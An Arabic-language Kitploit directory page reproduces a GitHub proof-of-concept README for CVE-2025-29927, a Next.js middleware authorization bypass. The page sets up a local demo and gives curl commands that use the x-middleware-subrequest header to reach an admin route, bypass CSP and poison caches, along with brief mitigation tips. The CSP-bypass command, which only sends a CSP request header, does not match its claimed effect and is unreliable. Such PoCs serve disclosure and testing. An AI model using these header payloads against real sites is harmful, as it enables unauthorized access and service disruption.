Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
POC-CVE-2025-29927 — CVE-2025-29927 إثبات المفهوم | Kitploit
أدوات/GitHubGitHub/eve-satoru/poc-cve-2025-29927
المصادقة والترخيصتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبتجاوز WAFأمن الويب
GitHubeve-satoru/poc-cve-2025-29927

POC-CVE-2025-29927

CVE-2025-29927 إثبات المفهوم

عرض المستودع
31منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-29927: تجاوز برمجيات Next.js الوسيطة PoC

نظرة عامة

يُظهر هذا الـ PoC ثغرة CVE-2025-29927، وهي ثغرة في البرمجيات الوسيطة لـ Next.js تسمح للمهاجمين بتجاوز آليات المصادقة والتفويض وCSP باستخدام ترويسة x-middleware-subrequest.

الإصدارات المتأثرة

إصدارات Next.js من 11.1.4 إلى 15.1.7

الإعداد والتثبيت

1️⃣ استنساخ وتثبيت الـ PoC

root@kitploit:~
git clone https://github.com/Eve-SatOrU/POC-CVE-2025-29927.git
cd POC-CVE-2025-29927
cd Demo 
cd my-next-app
npm install
npm run dev

سيبدأ التطبيق على http://localhost:3000

سيناريوهات الاستغلال

1️⃣ تجاوز المصادقة والتفويض (cURL)

1- استخدم x-middleware-subrequest للوصول غير المصرح به:

root@kitploit:~
curl -H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware" http://localhost:3000/admin

💥 النتيجة المتوقعة: يعيد الاستجابة admin admin، على الرغم من تجاوز المصادقة.

result screenshot

2️⃣ تجاوز CSP لحقن XSS

إذا كانت CSP مفروضة عبر البرمجيات الوسيطة، فتجاوزها:

root@kitploit:~
curl -H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware" \
     -H "Content-Security-Policy: default-src 'self'" \
     http://localhost:3000/admin

💥 النتيجة المتوقعة: يتم تجاهل CSP، مما يسمح بتنفيذ البرامج النصية الخبيثة.

3️⃣ هجوم حرمان الخدمة بتسميم ذاكرة التخزين المؤقت (CPDoS)

استغل تسميم ذاكرة التخزين المؤقت بفرض استجابة مشوهة:

root@kitploit:~
curl -H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware" \
     -H "Cache-Control: public, max-age=3600" \
     http://localhost:3000/admin

💥 النتيجة المتوقعة: يتم تخزين الصفحة مؤقتًا بمحتوى غير صحيح، مما يعطل المستخدمين العاديين.

استراتيجيات التخفيف

  • ✅ تحقق من منطق البرمجيات الوسيطة لمنع التجاوز.
  • ✅ قم بترقية Next.js بمجرد إصدار نسخة مصححة.

الاعتمادات

🔍 تم الاكتشاف بواسطة: Allam Rachid (zhero;) & Allam Yasser (inzo_)

تنزيل الأداة